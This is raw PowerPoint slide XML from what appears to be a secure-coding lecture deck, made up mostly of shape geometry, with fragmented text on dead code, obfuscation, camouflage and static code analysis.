                    <a:pt x="0" y="72945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5863" y="100161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22145" y="124269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43269" y="138128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67881" y="142748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93279" y="138128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116760" y="124269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454199" y="465264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1009824" y="465264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1009824" y="440626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462454" y="440626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129079" y="107886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137602" y="85123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138398" y="61610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131454" y="39645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116760" y="21526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94982" y="5381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6892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64551" y="4126991"/>
              <a:ext cx="1889759" cy="18897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44744" y="306451"/>
            <a:ext cx="536511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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Other</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-6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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-2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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Practices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29333" y="1933193"/>
            <a:ext cx="1359789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There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few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other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issues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arise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during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development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deployment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application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code.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8452" y="760476"/>
            <a:ext cx="7595616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799844" y="4360164"/>
            <a:ext cx="6065520" cy="2342515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6065520" h="2342515">
                <a:moveTo>
                  <a:pt x="5675122" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="390398" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341420" y="3041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294260" y="11921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249283" y="26273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206854" y="45734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167339" y="69936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131105" y="98515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98515" y="131105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69936" y="167339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45734" y="206854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26273" y="249283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11921" y="294260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3041" y="341420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="390398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1951990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3041" y="2000967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11921" y="2048127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26273" y="2093104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45734" y="2135533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69936" y="2175048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98515" y="2211282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131105" y="2243872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167339" y="2272451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206854" y="2296653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249283" y="2316114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294260" y="2330466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341420" y="2339346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390398" y="2342388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5675122" y="2342388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5724099" y="2339346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5771259" y="2330466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5816236" y="2316114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5858665" y="2296653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5898180" y="2272451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5934414" y="2243872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5967004" y="2211282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5995583" y="2175048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6019785" y="2135533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6039246" y="2093104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6053598" y="2048127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6062478" y="2000967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6065520" y="1951990"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6065520" y="390398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6062478" y="341420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6053598" y="294260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6039246" y="249283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6019785" y="206854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5995583" y="167339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5967004" y="131105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5934414" y="98515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5898180" y="69936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5858665" y="45734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5816236" y="26273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5771259" y="11921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5724099" y="3041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5675122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328417" y="5136970"/>
            <a:ext cx="5004435" cy="720090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="546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30"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Co</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-65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000" spc="1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0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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>tha</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-2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000" spc="-13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75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dirty="0" sz="2000" spc="-1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dirty="0" sz="2000" spc="-2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000" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ot</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5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dirty="0" sz="20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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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dirty="0" sz="2000" spc="-25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dirty="0" sz="2000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>te</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25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0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0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5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000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>oes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ot</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1905">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>af</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-4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000" spc="-25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dirty="0" sz="2000" spc="-4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0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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ro</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-8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dirty="0" sz="2000" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ra</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>flow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84476" y="3810000"/>
            <a:ext cx="5096510" cy="901065"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5096509" h="901064">
                <a:moveTo>
                  <a:pt x="4946142" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="150113" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102656" y="7650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61447" y="28955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28955" y="61447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7650" y="102656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="150113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="750570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7650" y="798027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28956" y="839236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61447" y="871728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102656" y="893033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150113" y="900684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4946142" y="900684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4993599" y="893033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5034808" y="871728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5067300" y="839236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5088605" y="798027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5096256" y="750570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5096256" y="150113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5088605" y="102656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5067300" y="61447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5034808" y="28955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4993599" y="7650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4946142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576829" y="4064635"/>
            <a:ext cx="45085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25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1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achabl</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-3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Code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an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Dead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Code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788907" y="4399788"/>
            <a:ext cx="6065520" cy="2342515"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6065519" h="2342515">
                <a:moveTo>
                  <a:pt x="5675122" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="390398" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341420" y="3041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294260" y="11921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249283" y="26273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206854" y="45734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167339" y="69936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131105" y="98515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98515" y="131105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69936" y="167339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45734" y="206854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26273" y="249283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11921" y="294260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3041" y="341420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="390398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1951989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3041" y="2000967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11921" y="2048127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26273" y="2093104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45734" y="2135533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69936" y="2175048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98515" y="2211282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131105" y="2243872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167339" y="2272451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206854" y="2296653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249283" y="2316114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294260" y="2330466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341420" y="2339346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390398" y="2342388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5675122" y="2342388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5724099" y="2339346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5771259" y="2330466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5816236" y="2316114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5858665" y="2296653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5898180" y="2272451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5934414" y="2243872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5967004" y="2211282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5995583" y="2175048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6019785" y="2135533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6039246" y="2093104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6053598" y="2048127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6062478" y="2000967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6065520" y="1951989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6065520" y="390398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6062478" y="341420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6053598" y="294260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6039246" y="249283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6019785" y="206854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5995583" y="167339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5967004" y="131105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5934414" y="98515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5898180" y="69936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5858665" y="45734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5816236" y="26273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5771259" y="11921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5724099" y="3041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5675122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9215755" y="5175859"/>
            <a:ext cx="5209540" cy="7207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28750" marR="5080" indent="-1416050">
              <a:lnSpc>
                <a:spcPct val="113999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5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dirty="0" sz="2000" spc="-13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7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0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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>disguised</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5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dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>nature</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5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0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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>inhibits </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-61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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>engineering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273540" y="3808476"/>
            <a:ext cx="5096510" cy="943610"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5096509" h="943610">
                <a:moveTo>
                  <a:pt x="4939029" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="157225" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107517" y="8012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64355" y="30325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30325" y="64355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8012" y="107517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="157225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="786129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8012" y="835838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30325" y="879000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64355" y="913030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107517" y="935343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157225" y="943356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4939029" y="943356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4988738" y="935343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5031900" y="913030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5065930" y="879000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5088243" y="835838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5096256" y="786129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5096256" y="157225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5088243" y="107517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5065930" y="64355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5031900" y="30325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4988738" y="8012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4939029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0021316" y="4084447"/>
            <a:ext cx="36010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Obfuscation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FFFFFF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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Camouflage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45428" y="306451"/>
            <a:ext cx="35655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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Static</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-9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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-6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E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Analysis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67861" y="1816760"/>
            <a:ext cx="9722485" cy="1173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14100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Static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code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analysis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is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executed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against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application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code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before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getting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packaged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as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executable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process.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="75565">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>W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ay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ana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yzi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7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des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ar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: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4708" y="760476"/>
            <a:ext cx="5003292" cy="3657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422653" y="4226814"/>
            <a:ext cx="6162040" cy="2173605"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6162040" h="2173604">
                <a:moveTo>
                  <a:pt x="0" y="362203"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3306" y="313058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12939" y="265920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28465" y="221224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49454" y="179399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75474" y="140878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106092" y="106092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140878" y="75474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179399" y="49454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221224" y="28465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265920" y="12939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313058" y="3306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="362203" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5799328" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5848473" y="3306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5895611" y="12939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5940307" y="28465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5982132" y="49454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6020653" y="75474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6055439" y="106092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6086057" y="140878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6112077" y="179399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6133066" y="221224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148592" y="265920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158225" y="313058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="362203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="1811020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158225" y="1860165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148592" y="1907303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6133066" y="1951999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6112077" y="1993824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6086057" y="2032345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6055439" y="2067131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6020653" y="2097749"/>
                </a:lnTo>
                <a:lnTo>
